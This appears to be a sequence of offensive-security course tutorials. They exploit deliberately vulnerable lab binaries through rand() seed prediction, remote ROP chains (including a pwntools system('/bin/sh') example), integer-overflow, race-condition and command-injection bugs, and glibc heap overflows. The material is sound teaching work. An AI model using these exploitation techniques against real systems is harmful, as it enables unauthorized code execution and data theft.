[Task] Your first task is to understand the template and write code that brute-forces the target server! Just by playing the same move five (or more) times, you have a pretty high chance of winning (1/2^5 = 1/32)!
[Task] Your first task is to understand the template and write code that brute-forces the target server!
Just by playing the same move five (or more) times, you have a pretty high chance of winning (1/2^5 = 1/32)!
Brute-forcing is dumb -- let's try a smarter approach.
Here's the most interesting part of target.c:
target.c
void start(int fd) { write(fd, "Let's play rock, paper, scissors!\nYour name> ", 44); char name[0x200]; if (read_line(fd, name, sizeof(name) - 1) <= 0) { return; } srand(*(unsigned int*)name + time(NULL)); int iter; for (iter = 0; iter < 5; iter ++) { write(fd, "Your turn> ", 11); char input[10]; if (read_line(fd, input, sizeof(input) - 1) <= 0) { return; } int yours = convert_to_int(input); if (yours == -1) { write(fd, "Not recognized! You lost!\n", 26); return; } int r = rand(); int result = yours - r % 3; if (result == 0) { write(fd, "Tie, try again!\n", 16); iter --; continue; } if (result == 1 || result == -2) { write(fd, "You win! try again!\n", 20); } else { write(fd, "You lose! Game over\n", 20); return; } } write(fd, "YOU WIN!\n", 9); dump_flag(fd); }
Did you notice the use of srand() and name as a seed for the game?
srand()
name
srand(*(unsigned int*)name + time(NULL));
Since the name variable is what you've provided, and the time is predictable, you can abuse this information to win the match every single time! (If only it was always that easy to win jackpots...)
In order to do that, you need to be able to call C functions such as srand() and rand() from Python, so let's discuss how to do that. (This is similar to the "weak-random" challenge from lab04, so this might be familiar if you solved that -- or it might not, since there are a variety of ways to do it!)
rand()
ref. https://docs.python.org/3/library/ctypes.html
from ctypes import * # How to invoke a C function in Python: libc = cdll.LoadLibrary('libc.so.6') libc.printf(b'hello world!\n')
This is how you can directly invoke the printf() function from Python. How would you invoke srand()/rand()?
There are several ways to cast a C string to an unsigned int in Python. When using pwntools, the best way is to use the u32() function, which is the inverse of the p32() function you're probably familiar with by now:
u32()
from pwn import * print(u32(b'test')) # prints 1953719668
Why is it 1953719668? The ASCII values for "t", "e", "s" and "t" are 0x74, 0x65, 0x73, 0x74. Because x86 is a little-endian architecture, four-byte integers are written and read in reversed byte order, i.e., 74 73 65 74. And 0x74736574 is 1953719668!
0x74
0x65
0x73
74
73
65
0x74736574
If you understand (1) and (2) above, you're ready to reliably beat the computer. Write a script that guesses the rand() output of the target and sends the winning move every time.
Once you get it working, don't forget that you can only get the "real" flag from port 10700 on our lab server:
[Task] Guess the output of the target's rand() and send the winning move five times in a row to defeat the computer. Then submit the flag it prints.
Good luck!
Today we'll exploit the 64-bit crackme0x00 from Tut06-02... remotely! We're going to use essentially the same binary, but this time, it'll be provided as a remote network service instead of directly as an executable file.
Try connecting to it:
$ nc [LAB_SERVER_IP] 10701
In Tut06-02, we exploited an x86_64 DEP-enabled crackme0x00 binary without any explicit leaks provided. In the second payload, we invoked a sequence of calls to read the flag as follows:
Unfortunately, this trick no longer works in a remote setting, because we can't create a symbolic link in a remote filesystem that we don't have access to. In other words, we need to either find an existing "/proc/flag" string somewhere in memory, or construct it ourselves.
[Task] Before you proceed further, make sure your exploit for Tut06-02 works against this remote service! But it shouldn't actually print the flag yet, as it fails to open /proc/flag.
Unfortunately, it's unlikely that either the binary or libc has a "/proc/flag" string. However, by ROP-ing, we can construct any string we want. Let's search for snippets of the string in memory.
In a GDB session, try:
> search "/proc" libc-2.27.so 0x7ffff7867a1d 0x65732f636f72702f ('/proc/se') libc-2.27.so 0x7ffff78690ed 0x65732f636f72702f ('/proc/se') ... > search "flag" libc-2.27.so 0x7ffff77f29e3 insb byte ptr [rdi], dx /* 'flags' */ libc-2.27.so 0x7ffff77f54ad insb byte ptr [rdi], dx /* 'flags' */ ...
Our plan is to use memcpy() to concatenate these two strings in some temporary, writable memory region:
memcpy(tmp2, PTR_TO_PROC, len("/proc/")); memcpy(tmp2+len("/proc/"), PTR_TO_FLAG, len("flag"));
Note: memcpy() is an "ifunc" in glibc, and those can be tricky to find correct offsets for. Tut06-02 included a tip for how to deal with that, so refer back to that section if you need to.
Once the string is in place, the rest of your payload would then be:
open(tmp2, 0);
tmp2
Your first thought might be to prepend the two memcpy() calls to that, but if you try it, you'll discover that the challenge binary only accepts 256 bytes of user input, which isn't enough for all five calls.
[Task] Try to exploit the program once again. It's now a three-stage exploit: Leak addresses and use them to find the desired functions and memory Build the "/proc/flag" string with two memcpy()s open() + read() + write() Can you successfully get the flag from the remote server?
[Task] Try to exploit the program once again. It's now a three-stage exploit:
Can you successfully get the flag from the remote server?
Although that does work, there's actually an easier method. Since we've hijacked control flow and can call whatever functions we want, we can directly inject our string ("/proc/flag") to an arbitrary memory region by simply invoking read() and providing the string on stdin:
read(0, tmp2, 11);
[Task] Can you tweak your exploit to accept "/proc/flag" and save it to tmp2?
Note: When feeding multiple inputs to a remote service, you may want to briefly pause the exploit in between with sleep(), or wait until the previous input is fully processed (e.g., using recvuntil()). Otherwise, due to buffering, multiple payloads might end up being read by the same read() call (e.g., the "/proc/flag" string could end up at the end of your initial ROP chain, even if you intended to send it as a separate input). Another option is to always send inputs that are exactly as large as the read() size (i.e., 256 bytes for this binary -- see start()), which forces read() to return before accepting your next input.
Note: When feeding multiple inputs to a remote service, you may want to briefly pause the exploit in between with sleep(), or wait until the previous input is fully processed (e.g., using recvuntil()). Otherwise, due to buffering, multiple payloads might end up being read by the same read() call (e.g., the "/proc/flag" string could end up at the end of your initial ROP chain, even if you intended to send it as a separate input).
sleep()
recvuntil()
Another option is to always send inputs that are exactly as large as the read() size (i.e., 256 bytes for this binary -- see start()), which forces read() to return before accepting your next input.
As mentioned in Tut06-01, you can also automate the ROP programming process with pwntools. Here's a slightly fancier example than the one from that tutorial:
#/usr/bin/env python3 from pwn import * context.arch = 'x86_64' # override pwntools's default cache directory to your secret tmp directory # (workaround for <https://github.com/Gallopsled/pwntools/issues/2072>) os.environ['XDG_CACHE_HOME'] = './' libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') libc.address = 0xdeadb000 # put the leaked libc base here rop = ROP(libc) # fill the buffer rop.raw(b'A' * 44) # system("/bin/sh") rop.system(next(libc.search(b'/bin/sh\x00'))) # exit(0) rop.exit(0) # get the payload payload = rop.chain()
While writing a ROP chain, it's a good idea to frequently check its payload using dump():
dump()
print(rop.dump()) 0x0000: 'AAAAAAAA' 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' 0x0008: 'AAAAAAAA' 0x0010: 'AAAAAAAA' 0x0018: 'AAAAAAAA' 0x0020: 'AAAAAAAA' 0x0028: 'AAAAaaaa' 0x0030: 0xdeafc55f pop rdi; ret 0x0038: 0xdec8f0fa [arg0] rdi = 3737710842 0x0040: 0xdeb2a4e0 system 0x0048: 0xdeafc55f pop rdi; ret 0x0050: 0x0 [arg0] rdi = 0 0x0058: 0xdeb1e1d0 exit
pwntools was even able to automatically find and use the pop rdi; ret gadget from libc!
If you're feeling ambitious, you can write your ROP chains more cleanly using this module.
The remote environment might use different libraries (e.g., libc), which can cause your exploit that relies on gadgets outside of the program itself to fail. If you're using a different Linux distribution, or have a different version of the same one, you need to make sure that you're testing your exploit with exactly the same libraries.
A simple way to avoid this problem is to copy the libraries from the remote server and use those:
[remote] $ ldd target-seccomp linux-vdso.so.1 (0x00007ffdb5cba000) libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007f6cc3f72000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6cc3b81000) /lib64/ld-linux-x86-64.so.2 (0x00007f6cc41be000) [local] $ scp lab07@[ip]:/lib/x86_64-linux-gnu/libc.so.6 . [local] $ scp lab07@[ip]:/lib64/ld-linux-x86-64.so.2 .
With these dynamic linker and libc libraries, you can launch target-seccomp essentially the same as if it was running on the remote server:
$ LD_LIBRARY_PATH=. ./ld-linux-x86-64.so.2 ./target-seccomp IOLI Crackme Level 0x00 Password: (meanwhile, in another console window:) $ cat /proc/$(pidof ld-linux-x86-64.so.2)/maps | grep libc 7f7792d50000-7f7792f37000 r-xp 00000000 08:01 /tmp/tut07-remote/libc.so.6 7f7792f37000-7f7793137000 ---p 001e7000 08:01 /tmp/tut07-remote/libc.so.6 7f7793137000-7f779313b000 r--p 001e7000 08:01 /tmp/tut07-remote/libc.so.6 7f779313b000-7f779313d000 rw-p 001eb000 08:01 /tmp/tut07-remote/libc.so.6
LD_LIBRARY_PATH=. instructs the linker to look for libraries in the current working directory when loading target-seccomp. As shown above, the maps file indicates that the libc.so.6 in the current directory is being used instead of the system's default libc.
LD_LIBRARY_PATH=.
maps
libc.so.6
You can do this in Python, too, in the same way:
p = process(['./ld-linux-x86-64.so.2', './target-seccomp'], env={'LD_LIBRARY_PATH': '.'})
Note that if you're using the same Linux distribution and version as the remote server, it's unlikely that you need to do this at all.
The stack alignment issues highlighted at the end of Tut06-02 can occur here, too. The solution is the same, so if you encounter segmentation faults on movaps instructions within libc, refer back to that section for help.
In this tutorial, we will learn about three class of popular logic bugs (i.e., non-memory safety bugs): an integer overflow, a race condition, and a command injection.
Let's first take a look on crackme0x00.c:
crackme0x00.c
void start() { int passwd; printf("IOLI Crackme Level 0x00\n"); printf("Password: "); scanf("%d", &passwd); if (absolute(passwd) < 0) { printf("Password OK :)\n"); round2(); } else { printf("Invalid Password!\n"); } }
It is asking for a password that its absolute value is less than zero: absolute(passwd) < 0. Note that the absolute() function is nothing but to convert any negative integer to its positive form by negativing the provided integer, as in the standard library:
absolute(passwd) < 0
absolute()
// @stdlib/abs.c /* Return the absolute value of I. */ int absolute(int i) { if (i<0) return -i; else return i; }
Is this mathematically feasible? No. However, as our computer can only express a small part of the integer space: e.g., a 32-bit register can express 2^32 numbers of integers (more on later), this password check can be bypassed!
Let's look at the actual instructions of absolute():
0000000000402118 <absolute>: 402118: 55 push rbp 402119: 48 89 e5 mov rbp,rsp 40211c: 89 7d fc mov DWORD PTR [rbp-0x4],edi 40211f: 83 7d fc 00 cmp DWORD PTR [rbp-0x4],0x0 402123: 79 07 jns 40212c <absolute+0x14> 402125: 8b 45 fc mov eax,DWORD PTR [rbp-0x4] 402128: f7 d8 neg eax 40212a: eb 03 jmp 40212f <absolute+0x17> 40212c: 8b 45 fc mov eax,DWORD PTR [rbp-0x4] 40212f: 5d pop rbp 402130: c3 ret
How does the machine perform the neg eax instruction? Unlike the arithmetic way of multiplying -1 to the multiplicand, the machine simply flips each bit (from 0 to 1 and vice versa) and adds one to the result. In two's complement representation, it happens to serve as a negation operation for most of the integers that a register can express.
neg eax
For example, 0x00000001 is a positive integer 1. If we flip every bit, it becomes 0b1111....1110, which is 0xfffffffe in a hexadecimal representation, and adding one to it, we get 0xffffffff. This is the two's complement representation of -1.
0x00000001
1
0b1111....1110
0xfffffffe
0xffffffff
-1
The biggest positive integer (i.e., INT_MAX) a 32-bit register can hold is 0x7fffffff, which is 2147483647. The smallest negative integer (i.e., INT_MIN) is 0x80000000, which is -2147483648 in decimal. One property that you might notice in two's complement is its asymmetry in representing the range of negative and positive integers: -2147483648 (INT_MIN) to 2147483647 (INT_MAX).
INT_MAX
0x7fffffff
INT_MIN
0x80000000
What's the arithmetic value of -INT_MAX? It is -2147483647. What about -INT_MIN? It is 2147483648, but it is bigger than INT_MAX! Now, let's approach this from the machine's perspective; try negating INT_MIN yourself by flipping the bits and adding one. Each bit in 0x80000000 are flipped, so it becomes 0x7fffffff, and then, adding one to 0x7fffffff results in 0x80000000, which is INT_MIN. In other words, when the machine negates INT_MIN, it ends up returning the same INT_MIN! Therefore, absolute(INT_MIN) shown above will return INT_MIN, which is not a positive integer.
-INT_MAX
-INT_MIN
neg
absolute(INT_MIN)
[Task] Phase 1 - provide a password to take the if branch and make the program print "Password OK :)". That will bring you to the next phase (Crackme Level 0x01).
if
Once the first phase is solved, crackme0x00 goes to the next phase. In this phase, it generates a password on-the-fly (see gen_new_passwd() in crackme0x00.c) and asks for the correct password.
gen_new_passwd()
void round2() { int passwd = gen_new_passwd(); save_passwd_into_vault(passwd); printf("IOLI Crackme Level 0x01\n"); printf("Password:"); char buf[32]; scanf("%31s", buf); if (atoi(buf) == passwd) { printf("Password OK :)\n"); printf("[!] Have a great fun!\n"); snake_main(); } else { printf("Invalid Password!\n"); } }
One interesting behavior of this program is that save_passwd_into_vault() temporarily stores the password to /tmp/.lock-[pid], and immediately removes the temporary file.
save_passwd_into_vault()
/tmp/.lock-[pid]
void save_passwd_into_vault(int passwd) { char tmpfile[100]; snprintf(tmpfile, sizeof(tmpfile), "/tmp/.lock-%d", getpid()); if (access(tmpfile, F_OK) != -1) { printf("the lock file exists, please first clean up\n"); exit(1); } FILE *fp = fopen(tmpfile, "w"); if (!fp) err(1, "failed to create %s", tmpfile); fprintf(fp, "%d", passwd); fclose(fp); /* DELETED! */ unlink(tmpfile); }
How would you steal the password stored in this file? Although the lifetime of this file is very short, it is stored in a predictable location (i.e., /tmp/.lock-[pid]), which gives an attacker an opportunity to leak the content inside the file by having a process racing to access the same file.
PID is (likely) assigned in a sequential order so that your exploit code might bruteforce after spawning a target (with process() in pwntool). In fact, the parent process knows the PID of a child process even before exec-ing the child's process image. If you are not familiar with the concept of fork(), please read man fork before writing the exploit!
exec
man fork
You might invoke process() together with stdin=PTY and stdout=PTY to manage the child process up to this stage (man pty). However, the interactive() of pwntools doesn't render the output of snake (next phase). We recommend using the below template for the next stage.
stdin=PTY
stdout=PTY
man pty
interactive()
snake
import os import pty (pid, fd) = pty.fork() if pid == 0: # child os.execle("./target", "./target", os.environ) exit(0) else: # parent lock = "/tmp/.lock-%d" % pid # this is how to write a message to the child os.write(fd, "...")
[Task] Phase 2 - exploit the race condition to steal the password that's generated on-the-fly. Provide the password and get "Password OK :)" printed, and get to the final phase.
Once you have passed the first two phases, you can see an Easter Egg -- an old-fashioned snake game. First, take a look at snake/snake.c (from Micro Snake).
snake/snake.c
Have you noticed an interesting piece of code in the main()?
// snake/snake.c void snake_main() { ... if (WEXITSTATUS(system ("stty cbreak -echo stop u"))) { fprintf (stderr, "Failed setting up the screen, is 'stty' missing?\n"); return 1; } }
Interestingly, the binary invokes a libc's system() when it starts (check man stty!). In fact, such a pattern is vulnerable to a command injection attack (e.g., in a setuid binary). How would you hijack crackme0x00 without exploiting a memory corruption bug like previous labs?
man stty
At this point, you might realize that this technique would have come in handy when you were solving the bomb challenges (labs 1 and 2). How come?
[Task] Final phase - inject a command to the snake game to print the flag. Submit the flag on the submission site.
Now that everyone has well experienced the stack corruptions from the previous labs, from this lecture we will play with bugs on the heap, which are typically more complex than the stack-based ones.
For educational purposes, this tutorial will use a retired memory allocator (i.e., GLIBC < 2.26) and the next tutorial will use an updated memory allocator (GLIBC >= 2.27).
The heap space is the dynamic memory segment used by a process. Generally, we can allocate a heap memory object by malloc() and release it by free() when the resource is no longer needed. However, there are plenty of questions left to be answered, for example:
malloc()
free()
Do not worry if you don't, as you will get the answers to these questions if you follow through.
Let's start our adventure with a new heap-based crackme0x00.
char password[] = "250382"; int main(int argc, char *argv[]) { char *buf = (char *)malloc(100); char *secret = (char *)malloc(100); strcpy(secret, password); printf("IOLI Crackme Level 0x00\n"); printf("Password:"); scanf("%s", buf); if (!strcmp(buf, secret)) { printf("Password OK :)\n"); } else { printf("Invalid Password! %s\n", buf); } return 0; }
You can see that now the input in buf is put on a piece of dynamic memory which has a size of 100. Meanwhile the secret of 250382 is also placed on the heap inside a memory block with the same size.
250382
Our first task is to observe the exact memory location of these two heap objects. Let's check crackme0x00 in gdb.
(gdb) disassemble main Dump of assembler code for function main: ... 0x080486b0 <+106>: call 0x80484c0 <malloc@plt> 0x080486b5 <+111>: add esp,0x10 0x080486b8 <+114>: mov DWORD PTR [ebp-0x20],eax 0x080486bb <+117>: sub esp,0xc 0x080486be <+120>: push 0x64 0x080486c0 <+122>: call 0x80484c0 <malloc@plt> 0x080486c5 <+127>: add esp,0x10 0x080486c8 <+130>: mov DWORD PTR [ebp-0x1c],eax 0x080486cb <+133>: sub esp,0x8 0x080486ce <+136>: lea eax,[ebx+0x3c] 0x080486d4 <+142>: push eax 0x080486d5 <+143>: push DWORD PTR [ebp-0x1c] 0x080486d8 <+146>: call 0x80484b0 <strcpy@plt> 0x080486dd <+151>: add esp,0x10 0x080486e0 <+154>: sub esp,0xc 0x080486e3 <+157>: lea eax,[ebx-0x1810] 0x080486e9 <+163>: push eax 0x080486ea <+164>: call 0x80484d0 <puts@plt> 0x080486ef <+169>: add esp,0x10 0x080486f2 <+172>: sub esp,0xc 0x080486f5 <+175>: lea eax,[ebx-0x17f8] 0x080486fb <+181>: push eax 0x080486fc <+182>: call 0x8048490 <printf@plt> 0x08048701 <+187>: add esp,0x10 0x08048704 <+190>: sub esp,0x8 0x08048707 <+193>: push DWORD PTR [ebp-0x20] 0x0804870a <+196>: lea eax,[ebx-0x17ee] 0x08048710 <+202>: push eax 0x08048711 <+203>: call 0x8048510 <__isoc99_scanf@plt> 0x08048716 <+208>: add esp,0x10 ...
From the assembly, we can see that the function malloc() is invoked for two times. As we are interested in its return value, let's set two breakpoints at the next following instructions, 0x80486b5 and 0x80486c5, perspectively and start the program.
0x80486b5
0x80486c5
(gdb) b *0x80486b5 Breakpoint 1 at 0x8048685: file crackme0x00.c, line 14. (gdb) b *0x80486c5 Breakpoint 2 at 0x8048695: file crackme0x00.c, line 15. (gdb) r Starting program: tut09-heap/crackme0x00 Breakpoint 1, 0x080486b5 in main (argc=1, argv=0xffb09244) at crackme0x00.c:14 14 char *buf = (char *)malloc(100);
At Breakpoint 1, the program stops after returning from the first malloc() function. We can check the return value stored in register eax.
Breakpoint 1
eax
(gdb) i r eax eax 0x804b008 134524936
As you can see, buf points at 0x804b008 which will store our input. Note that you might see a different value in eax due to ASLR but it is totally fine. Let's continue the execution.
0x804b008
(gdb) c Continuing. Breakpoint 2, 0x080486c5 in main (argc=1, argv=0xffffdee4) at crackme0x00.c:15 15 char *secret = (char *)malloc(100);
The second malloc() returns. Similarly, we can find its return value stored in register eax as 0x804b070.
0x804b070
(gdb) i r eax eax 0x804b070 134525040
Note that although the value might still be different from yours, it should have the consistent offset from the previous value across any runs (i.e., 0x804b070 - 0x804b008 = 0x68). We can now take a look into these two memory locations.
0x68
(gdb) x/60wx 0x804b008 - 8 0x804b000: 0x00000000 0x00000069 0x00000000 0x00000000 0x804b010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b040: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b050: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b060: 0x00000000 0x00000000 0x00000000 0x00000069 0x804b070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b090: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0a0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0b0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0c0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0d0: 0x00000000 0x00020f31 0x00000000 0x00000000 0x804b0e0: 0x00000000 0x00000000 0x00000000 0x00000000
Since we have not given our input and the program has not initialized the secret password, both of these heap objects are empty. However, you might be wondering at this moment: the returned address of the first heap object was 0x804b008, and so why didn't it start from 0x804b000? Where does that 8-byte offset come from?
0x804b000
Let's first take a look at the memory layout of the process.
process 194 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x8048000 0x8049000 0x1000 0x0 /home/lab09/tut09-heap/crackme0x00 0x8049000 0x804a000 0x1000 0x0 /home/lab09/tut09-heap/crackme0x00 0x804a000 0x804b000 0x1000 0x1000 /home/lab09/tut09-heap/crackme0x00 0x804b000 0x806c000 0x21000 0x0 [heap] 0xf7e1b000 0xf7e1c000 0x1000 0x0 0xf7e1c000 0xf7fcc000 0x1b0000 0x0 /ubuntu_1604/lib/i386/libc-2.23.so 0xf7fcc000 0xf7fcd000 0x1000 0x1b0000 /ubuntu_1604/lib/i386/libc-2.23.so 0xf7fcd000 0xf7fcf000 0x2000 0x1b0000 /ubuntu_1604/lib/i386/libc-2.23.so 0xf7fcf000 0xf7fd0000 0x1000 0x1b2000 /ubuntu_1604/lib/i386/libc-2.23.so 0xf7fd0000 0xf7fd4000 0x4000 0x0 0xf7fd4000 0xf7fd7000 0x3000 0x0 [vvar] 0xf7fd7000 0xf7fd9000 0x2000 0x0 [vdso] 0xf7fd9000 0xf7ffc000 0x23000 0x0 /ubuntu_1604/lib/i386/ld-2.23.so 0xf7ffc000 0xf7ffd000 0x1000 0x22000 /ubuntu_1604/lib/i386/ld-2.23.so 0xf7ffd000 0xf7ffe000 0x1000 0x23000 /ubuntu_1604/lib/i386/ld-2.23.so 0xfffdd000 0xffffe000 0x21000 0x0 [stack]
The [heap] label indicates the memory starting from 0x804b000 to 0x806c000 as the heap memory. While the first allocated heap object storing our input does not start from 0x804b000, we can make an educational guess that the 8-byte offset, including the strange value of 0x69 at 0x804b004 is caused by the libc library.
[heap]
0x806c000
0x69
0x804b004
libc
By simple calculation, since we first allocate for 100 bytes and 0x804b008 + 100 = 0x804b06c, the memory space from 0x804b008 to 0x804b06c is used to store the input. If the libc appends 8 bytes ahead of every allocated heap object and considering the returned address of the second heap object is 0x804b070, then the 8 bytes starting at 0x804b070 - 8 = 0x804b068 should all belong to the second heap object.
0x804b008 + 100 = 0x804b06c
0x804b06c
0x804b070 - 8 = 0x804b068
Most Linux distributions nowadays use ptmalloc as its malloc implementation in the libc. In the ptmalloc's implementation, a memory object is called a "chunk" in libc. The following picture illustrates the exact structure of an allocated "chunk".
ptmalloc
malloc
"chunk"
In libc:
struct malloc_chunk { INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */ struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /* Only used for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ struct malloc_chunk* bk_nextsize; }; typedef struct malloc_chunk* mchunkptr;
Visualization:
chunk-> +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Size of previous chunk, if freed | | +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Size of chunk, in bytes |A|M|P| mem-> +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | User data starts here... . . . . . . | nextchunk-> +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+ | Size of chunk | +-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-+
Carefully check this picture and all your doubts can be solved:
chunk
mem
size of previous chunk, if freed
size of the current chunk
Meanwhile, the first four bytes after chunk are a bit special. There are two cases:
108
104
LSB
size
0
Let's continue the program and check the memory again. That will give you a better understanding of the illustration above. Set a breakpoint after scanf() and give our input.
(gdb) b *0x8048716 Breakpoint 3 at 0x8048716: file crackme0x00.c, line 22. (gdb) c Continuing. IOLI Crackme Level 0x00 Password:AAAABBBBCCCCDDDD Breakpoint 3, 0x08048716 in main (argc=1, argv=0xffb09244) at crackme0x00.c:22 22 scanf("%s", buf);
And check the content inside these two heap objects.
(gdb) x/s 0x804b008 0x804b008: "AAAABBBBCCCCDDDD" (gdb) x/s 0x804b070 0x804b070: "250382" (gdb) x/60wx 0x804b000 0x804b000: 0x00000000 0x00000069 0x41414141 0x42424242 prev_size size buf data --> 0x804b010: 0x43434343 0x44444444 0x00000000 0x00000000 0x804b020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b040: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b050: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b060: 0x00000000 0x00000000 0x00000000 0x00000069 <-- buf data size 0x804b070: 0x33303532 0x00003238 0x00000000 0x00000000 secret data --> 0x804b080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b090: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0a0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0b0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0c0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804b0d0: 0x00000000 0x00020f31 0x00000000 0x00000000 <-- secret data
Does it now make sense? scanf() reads our input "AAAABBBBCCCCDDDD" directly onto the heap without any size limit. And more importantly, the heap chunks are placed adjacently. Based on your former experience with stack overflows, it is not hard for you to corrupt the stored secret and pass the check at this moment, right? :)
"AAAABBBBCCCCDDDD"
[NOTE]: When ASLR is on, the heap base varies for every run. You can launch the program for multiple times and check the heap base through /proc/$(pidof crachme0x00)/maps.
/proc/$(pidof crachme0x00)/maps
// 1st run $ cat /proc/$(pidof crackme0x00)/maps 08048000-08049000 r-xp 00000000 08:02 72746077 /home/lab09/tut09-heap/crackme0x00 08049000-0804a000 r--p 00000000 08:02 72746077 /home/lab09/tut09-heap/crackme0x00 0804a000-0804b000 rw-p 00001000 08:02 72746077 /home/lab09/tut09-heap/crackme0x00 0927f000-092a0000 rw-p 00000000 00:00 0 [heap] ... // 2nd run $ cat /proc/$(pidof crackme0x00)/maps 08048000-08049000 r-xp 00000000 08:02 72746077 /home/lab09/tut09-heap/crackme0x00 08049000-0804a000 r--p 00000000 08:02 72746077 /home/lab09/tut09-heap/crackme0x00 0804a000-0804b000 rw-p 00001000 08:02 72746077 /home/lab09/tut09-heap/crackme0x00 09375000-09396000 rw-p 00000000 00:00 0 [heap] ...
And it does not even tightly follow the address space of the process as shown in gdb when ASLR is off. However, we want to emphasize that for ptmalloc, the heap layout and the values of many meta data can be accurately inferred even tons of malloc() and free() have been called in a program.
[Task] Can you inject a payload to print out Password OK :)? Try getting your flag from target!
Now we are going to explore more facts about the glibc heap with the help of pwndbg and the targeted example program is heap-example. Here is the code:
#include <stdlib.h> #include <unistd.h> void prompt(char *msg, unsigned int len) { char tmp; write(STDOUT_FILENO, msg, len); read(STDIN_FILENO, &tmp, 1); } int main() { void *fb_0 = malloc(16); void *fb_1 = malloc(32); void *fb_2 = malloc(16); void *fb_3 = malloc(32); prompt("Stage 1", 7); free(fb_1); free(fb_3); prompt("Stage 2", 7); free(fb_0); free(fb_2); malloc(32); prompt("Stage 3", 7); void *nb_0 = malloc(100); void *nb_1 = malloc(120); void *nb_2 = malloc(140); void *nb_3 = malloc(160); void *nb_4 = malloc(180); prompt("Stage 4", 7); free(nb_1); free(nb_3); prompt("Stage 5", 7); void *nb_5 = malloc(240); prompt("Stage 6", 7); free(nb_2); prompt("Stage 7", 7); return 0; }
The program simply allocates some heap objects with various sizes and frees them accordingly. It is divided into several stages and at each stage, the program stops and we have a chance to look into the memory by using pwndbg heap commands.
Let's launch the program in pwndbg and stop at Stage 1 by using Ctrl+C to interrupt the execution. Enter command arenas:
$ gdb-pwndbg heap-example pwndbg> r Starting program: /home/lab09/tut09-heap/crackme0x00 Stage 1^C Program received signal SIGINT, Interrupt. 0xf7fd8059 in __kernel_vsyscall () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ... Program received signal SIGINT pwndbg> arenas [ main] [0x804b000] 0x804b000 0x806c000 rw-p 21000 0 [heap]
The data structure used by ptmalloc to bookmark heap chunks are called arena. One arena is in charge of one process/thread heap. A process can have a lot of heaps simultaneously, and the arena of the initial heap is called the main arena, which points at 0x804b000 in this case.
arena
main arena
The program allocates 4 heap objects with size 16, 32, 16, 32 in order. We can type command heap to print a listing of all the chunks in the arena. (You can also try heap -v for more detailed results).
heap -v
pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x804b000 Size: 0x19 Allocated chunk | PREV_INUSE Addr: 0x804b018 Size: 0x29 Allocated chunk | PREV_INUSE Addr: 0x804b040 Size: 0x19 Allocated chunk | PREV_INUSE Addr: 0x804b058 Size: 0x29 Top chunk | PREV_INUSE Addr: 0x804b080 Size: 0x20f81
As we expected, the four heap chunks are placed adjacently in the memory. (Q: Why the sizes shown above are 0x19 = 25 and 0x29 = 41, respectively?)
0x19 = 25
0x29 = 41
We can see a very large heap chunk at the bottom that is not in use, and it has a special name called top chunk. You can visualize the heap layout by command vis_heap_chunks. In pwndbg, the result is nicely colored.
top chunk
pwndbg> vis_heap_chunks 0x804b000 0x00000000 0x00000019 ........ 0x804b008 0x00000000 0x00000000 ........ 0x804b010 0x00000000 0x00000000 ........ 0x804b018 0x00000000 0x00000029 ....)... 0x804b020 0x00000000 0x00000000 ........ 0x804b028 0x00000000 0x00000000 ........ 0x804b030 0x00000000 0x00000000 ........ 0x804b038 0x00000000 0x00000000 ........ 0x804b040 0x00000000 0x00000019 ........ 0x804b048 0x00000000 0x00000000 ........ 0x804b050 0x00000000 0x00000000 ........ 0x804b058 0x00000000 0x00000029 ....)... 0x804b060 0x00000000 0x00000000 ........ 0x804b068 0x00000000 0x00000000 ........ 0x804b070 0x00000000 0x00000000 ........ 0x804b078 0x00000000 0x00000000 ........ 0x804b080 0x00000000 0x00020f81 ........ <-- Top chunk
Continue the execution by entering anything you like for read(), and now we arrive at Stage 2, with the 2nd and 4th heap objects already freed. In ptmalloc, the freed chunks are stored into linked list-alike structures called bins. The chunk with size from 16~64 bytes (in 32-bit) belongs to the fastbins, which are singly linked lists. We can use command fastbins to have a check.
bins
fastbins
pwndbg> fastbins fastbins 0x10: 0x0 0x18: 0x0 0x20: 0x0 0x28: 0x804b058 -> 0x804b018 <- 0x0 0x30: 0x0 0x38: 0x0 0x40: 0x0
